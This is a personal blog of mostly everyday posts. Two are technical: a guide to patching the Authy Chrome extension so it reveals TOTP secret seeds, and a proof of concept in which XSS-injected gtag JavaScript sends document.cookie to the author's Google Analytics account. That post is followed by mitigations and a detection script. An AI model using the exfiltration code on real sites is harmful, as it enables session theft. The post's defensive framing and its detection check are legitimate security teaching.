kyhwana: (Default)
Oh hai, I guess dreamwidth is still a thing!
 
kyhwana: (baby wifi ap)
This is a quick hack to the Chrome Authy (version 2.5.0_1) extension (gaedmjdfmmahhbjefcbgaolhhanlaolb) https://chrome.google.com/webstore/detail/authy/gaedmjdfmmahhbjefcbgaolhhanlaolb?hl=en that will let you copy out your TOTP secret seeds. This is based off an existing blog post at https://www.pommepause.com/2014/10/how-to-extract-your-totp-secrets-from-authy/

Note that the secret seed is the "secret" used to generate the TOTP rolling code, so store it somewhere safe and encrypted: anyone with this secret can generate TOTP tokens for the account it belongs to. I would suggest a separate KeePass database stored on a USB drive (BitLocker or VeraCrypt encrypted) that you keep either on your keyring or in a safe.
 
Find where Chrome stores extensions for your OS:
Windows: C:\Users\<Your_User_Name>\AppData\Local\Google\Chrome\User Data\Default\Extensions 
Linux: ~/.config/google-chrome/Default/Extensions/
OS X: ~/Library/Application\ Support/Google/Chrome/Default/Extensions
The authy extension will be in the gaedmjdfmmahhbjefcbgaolhhanlaolb directory and the "app.js" file we want to modify is under that, in the version number/js/. (2.5.0_1 as of 2018-01-24)
MAKE SURE YOU TAKE A BACKUP of app.js, in case something goes wrong or you want to restore the default app behaviour.
 
Open app.js in your favourite JavaScript IDE and beautify the code. (In Visual Studio Code, this is Alt-Shift-F.)
Find the lines:
 }, d.prototype.getOtp = function () {
                return this.isEncrypted() ? "------" : this.otpGenerator.getOtp(this.decryptedSeed, this.digits)
and paste in the following lines below the above:
 
}, d.prototype.getSharedSecret = function() {
                return this.isEncrypted() ? "?" : this.decryptedSeed
 
This will get the shared secret from an account.
 
Find the lines:
 }), f(".copy").click(function (t) {
                    var n, r, o;
                    return n = f(this), o = function () {
                        return n.text("Copy")
                    }, r = n.parent().find(".tokenCodeString")[0], e.onCopyClicked(r), n.text("Copied"), setTimeout(o, 1e3)
 
and paste in the following lines below the above:
}), f(".copysecret").click(function (t) {
                    var n, r, o;
                    return n = f(this), o = function () {
                        return n.text("Copy Secret")
                    }, r = n.parent().find(".sharedSecret")[0], e.onCopyClicked(r), n.text("Copied secret"), setTimeout(o, 1e3)
 
Here we're adding a function to copy the secret to the clipboard when you click the "copy secret" button.
 
Next find:
}, TokensView.prototype.updateTokens = function (t) {
                var e, r, o, i, s, a;
               for (s = [], o = 0, i = t.length; o < i; o++) a = t[o], r = f(a), e = n.get().find(r.attr("data-token-id")), r.find(".tokenCode").html(e.formatToken()(e.getOtp())), s.push(r.find(".tokenCodeString").html(e.getOtp()));
             
and add:
                for (s = [], o = 0, i = t.length; o < i; o++) a = t[o], r = f(a), e = n.get().find(r.attr("data-token-id")), r.find(".sharedSecret").html(e.formatToken()(e.getSharedSecret())), s.push(r.find(".sharedSecret").html(e.getSharedSecret()));
 
right underneath the for loop, but before "return s"
This finds the shared secret and displays it.
 
Lastly is the messy HTML bit: (Turn on word wrap for this)
Find "t.exports = '<div class="tokens-screen">\n\n    {{> navbar}}\n\n    {{> tokens_navbar}}\n\n    <div id="tokens-view" class="container">\n        {{#apps}}\n            {{! This will be rendered if the app is decrypted}}\n" 
Find "<span class="tokenCodeString">{{ getOtp }}</span>\n" and immediately after this paste in: "<br><span class="sharedSecret">{{ getSharedSecret }}</span>\n"
Then find the line that has "<button class="button-copy copy">Copy</button>\n" and add immediately after the \n but before the "</div>" the following:
"<button class="button-copy copysecret">Copy secret</button>\n"
 
This adds the "Copy secret" button, which will copy the secret to the clipboard when clicked.
 
Finally save this, close the authy extension window and reopen it. 
kyhwana: (Default)
So I was inspired after reading https://www.reddit.com/r/btc/comments/7dsmvd/my_analysis_of_the_1_million_usd_mybtgwalletcom/ where someone modified the JavaScript source of a bitcoin wallet to send user secrets to the attacker's Google Analytics account, and I figured I should see if this was actually possible. It turns out that yes, yes you can.

The requirement for this attack is that you can get the client browser to execute some JavaScript. In most cases this would be via XSS, by modifying the website's JavaScript in some way, or by uploading a JavaScript file that you can get included and executed (usually via XSS, if you can't get the server or client to fetch your JavaScript for you).

Given that we need XSS or some kind of MITM/modification of source files, you might ask "Why would we use Google Analytics for exfil"?
Well, if the client/server isn't blocking Google Analytics, anyone looking at IDS/DNS log files will see a normal GA connection (protected by HTTPS!) and think nothing of it. It's a sneaky way of exfiltrating data that, before the btg wallet hack, I had not seen.

Let's get started!

First of all you need a GA account. This is easy, Google will give you one for free.
Create a Custom Dimension as specified here: https://developers.google.com/analytics/devguides/collection/gtagjs/custom-dims-mets
This will let us set a variable to anything we want (Such as cookies that javascript can access or any other javascript variable) and have it sent to GA.

[Image: Setup Custom dimensions]

Create a custom report:
[Image: Create custom report]

We host or upload our GA javascript somewhere:

document.write('');
var secrets='totes javascripts secrets PoC here';
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-ID-2',{'custom_map': {'dimension2': 'pass'}});
gtag('event', 'pass_dimension' , {'pass': document.cookie+' '+secrets});


Insert via XSS (Reflected or Stored works) and here you can see our GA cookie and some javascript variables being sent to GA (I used DVWA locally to XSS)
[Image: Away we go]

and here is the GA dashboard showing our secrets, including the DVWA PHP session ID.
[Image: Secrets]


So how do you protect against this?
Find and fix all the XSS or remote/local file inclusion vulnerabilities.
Ad/tracking blockers on the client side that block Google Analytics will stop this from being exploited on the client side. On a corporate network, block the GA hosts at a network or endpoint level.
Set the HttpOnly flag on your cookies, so that JavaScript can't access them.
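A detection check to go with the mitigations above, as an added example that is not part of the original post: it flags Google Analytics hits whose property ID (the tid parameter) is not one the site owns, or whose custom dimensions (cdN parameters) carry cookie-like or oversized values. It assumes a TLS-inspecting proxy that logs full request URLs (without one, HTTPS hides these parameters), hits sent as GET requests to the /collect endpoint, and the allowlist, host list, threshold and log lines shown, all of which are constructed.

```javascript
// Added example: flag Google Analytics hits that go to a property the site does not own.
// All values below are constructed for illustration.
const ALLOWED_TIDS = new Set(['UA-1111111-1']);      // properties you actually own
const GA_HOSTS = new Set(['www.google-analytics.com', 'ssl.google-analytics.com']);
const MAX_DIMENSION_LEN = 64;                         // assumed threshold, tune per site
const COOKIE_LIKE = /(^|[;\s])[\w.-]+=[^;\s]+(;|$)/;  // name=value pairs as in document.cookie

// Returns null for uninteresting URLs, otherwise the reasons the hit is suspicious.
function inspectHit(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  if (!GA_HOSTS.has(url.hostname) || !url.pathname.endsWith('/collect')) return null;

  const reasons = [];
  const tid = url.searchParams.get('tid');
  if (!ALLOWED_TIDS.has(tid)) reasons.push('unknown property ' + tid);

  for (const [key, value] of url.searchParams) {
    if (!/^cd\d+$/.test(key)) continue;               // cd<N> = custom dimension N
    if (value.length > MAX_DIMENSION_LEN) reasons.push(key + ' is ' + value.length + ' chars');
    if (COOKIE_LIKE.test(value)) reasons.push(key + ' contains cookie-like data');
  }
  return reasons.length ? { tid, reasons } : null;
}

// Run the check over a list of logged URLs and keep only the flagged hits.
function scanLog(urls) {
  return urls.map(inspectHit).filter(Boolean);
}

// Constructed log lines (full request URLs as a TLS-inspecting proxy would record them).
const SAMPLE_LOG = [
  'https://www.google-analytics.com/collect?v=1&tid=UA-1111111-1&t=pageview&dp=%2Fhome',
  'https://www.google-analytics.com/collect?v=1&tid=UA-9999999-2&t=event&ea=pass_dimension' +
    '&cd2=PHPSESSID%3Dabc123%3B%20security%3Dlow%20demo',
  'https://example.org/collect?tid=UA-9999999-2',
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```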
kyhwana: (leopard)
Welp, with the new TOS update, (Section 9.2.8) you can't be the LGBTQ or post anything about the LGBTQ's on LJ, so importing everything to DW and then deleting all the posts except this one.
http://www.livejournal.com/legal/tos-en.bml
(Remember, it's basically illegal to be LGBTQ or talk about it favourably in any way
kyhwana: (Kapuli Broken Halo)
Oh hey, it's been almost 2 years since my last post. *looks at last post* Oh shit.

Well, in those two years I've gone through 2 jobs (both infosec related) and am currently funemployed in Wellington NZ.

Posting here because I've just been randomly going through old Rick Emerson things from when I was living in Portland, OR, given the current events in the US. x.x
kyhwana: (Gir)
So it turns out that Cyanogenmod's updater uses http and is vulnerable to MITM attacks.

If you use Cyanogenmod, read the above and don't use the built in updater!
kyhwana: (Kyhwana head)
Ohh, a post!
Spent the last few days down south at a scout campsite outside of Wellington, with no cell reception with a bunch of NZ furs.
Besides the rain and being tired from lack of sleep, a good time was had! Just what I needed as a chance to get away from technology for a few days.

Got new job starting near the end of this month, been at the old one for nearly six years and the whole being bought out by a big US company and a few other things there are making it kinda meh, so should be a good change..

Living in Auckland with lyctiger now, other than those two changes, not much has been going on I guess! Still single/kinda looking but not, need to cut my mullet hair (again), got lots of shineys to play with..
kyhwana: (leopard)
Ugh, so sick of these allergies/antihistamines that sort of work! *goes to bed*
kyhwana: (leopard)
http://www.sbs.com.au/news/article/1723242/Women-bring-violence-on-themselves-priest
So, according to this Catholic Priest, women bring rape on themselves...

"How often do we see girls and mature women going around scantily dressed and in provocative clothes?" Piero Corsi said in a Christmas message posted on the door of his church in the small town of San Terenzio in northwest Italy.
"They provoke the worst instincts, which end in violence or sexual abuse. They should search their consciences and ask: did we bring this on ourselves?" it read.
"The fact is that women are increasingly provocative, they become arrogant, they believe themselves to be self-sufficient and end up exacerbating the situation," he said.
"Are women themselves not causing harm by unveiling themselves like this?"

Replace girls/women with boys/men, then see how that sounds!
You're a goddam sentient being, how about not acting on "worst instincts" and simply NOT RAPING PEOPLE.
They didn't fucking bring this on themselves, another (male) sentient being CHOSE to violate another being!
I can only assume this priest is a hypocrite like the rest of them and is actually dicking some young boys on side and then spouting this crap.

Women are provocative?! They are and can be self-sufficient! They have the right to do so!
If you think that other sentient beings don't deserve the right to self-determination, then you need to look at yourself and hey, maybe YOU don't deserve the right to determine your own destiny.
kyhwana: (Default)
Wow, it's been over a year since I posted here.

Still alive! Doing OKish, it's spring now, so omgpollenfuckingmysinuses.
kyhwana: (Default)
Emotion + cold hard logic = boom. Sometimes I wish Prozium was real.

Done.

Sep. 4th, 2011 03:55 am
kyhwana: (Default)
I think I'm Done. (And here I am not quite 30, surprised I lasted this long, although I shouldn't be surprised, naive old me.)
kyhwana: (Jesus 2nd coming look busy)
Raptured yay!

Wait no, still here and the internet still sucks which means all the christians didn't get raptured. God Dammnit!
kyhwana: (Default)
Another Earthquake in New Zealand. I'm OK, again it was another quake in Christchurch, nowhere near me.

But this one was worse than the last one, despite being a 6.3 (The last one in September was 7.1) but only 5km depth, 10km outside of Christchurch.

Fortunately I've heard from my family and friends in Christchurch, they're all OK.
kyhwana: (Default)
Oh Hai LJ.

Meme time!
"Movies you would watch while drunk, then have sex to after watching still while drunk."

I think the only movie I've done this to is Spaceballs XD
kyhwana: (Default)
Ohyeah, it's 2011 already!
kyhwana: (Discordia eris)
Quick furconz review:
- Managed to take lots of anti-histamines. I think I ended up hallucinating once or twice. The sunglasses I wore most of the time helped with my eyes a bit!
- Didn't get drunk. Woo.
- Food was good. Ended up with sirloin steak, spaghetti bolognese, mild chicken curry for dinners. Sandwiches etc for lunches and some stuff I forget for breakfast.
- Hookahs are awesome. Depressed people getting drunk and trying to steal booze, me twinging my shoulder trying to keep them from stealing said booze is not. DRAMA.
- Went kayaking and on a ~4 hour hike. Those were awesome.
- Redtail decided to rope a bunch of people into building a raft using 2x4s and 40 gallon barrels to make a raft in the pool below the water falls as fun to watch.
- Managed not to get sunburnt, applied lots of sunscreen!
- Singstar was fun, Sunday night.
- Spent Friday running around before the con picking stuff up, loading stuff etc. Again, had lots of time to setup Friday evening. Stood around for a few hours waiting till the 'con opened XD
- RAGE BEATLES. Damn huhu grubs.
- Picked up some thinkgeek shirts at the 'con. The XKCD "Im about to do SCIENCE" shirt and a "cd /pub" shirt. Also picked up some commissions. (below)
- Saw a whole bunch of people I hadn't seen since last year! Good to see you all again. Hopefully will get to see some of you again before next years. XD
- Was completely wiped out Monday/tuesday! I ended up having muscle lag, I would go to move a limb and it would take a second for said limbs to move. That was weird.
Stats:
Final attendance: 66
Full registrations (staying at the Lodge over the weekend): 65
Day passes: 1

And more even more statistics:
Oldest attendee: 43 years old
Youngest attendee: 16 years old
Average age of our attendees: 25 years old
Male attendees: 53
Female attendees: 13

From Phone
kyhwana: (Default)

Mah new license plate surround:


Just because I like to screw with people..

Also apparently FA admins close down journal entries that "harass christians". pfft, whatever. Lame.




kyhwana: (Default)
Ohh look! New Iain M. Banks novel is out!
Surface Detail.. There's even a kindle version, yay!

Ohwait.
Not available in my location? The ELECTRONIC VERSION??
FAIL!
*pirates instead*

Page generated Jul. 8th, 2025 03:34 am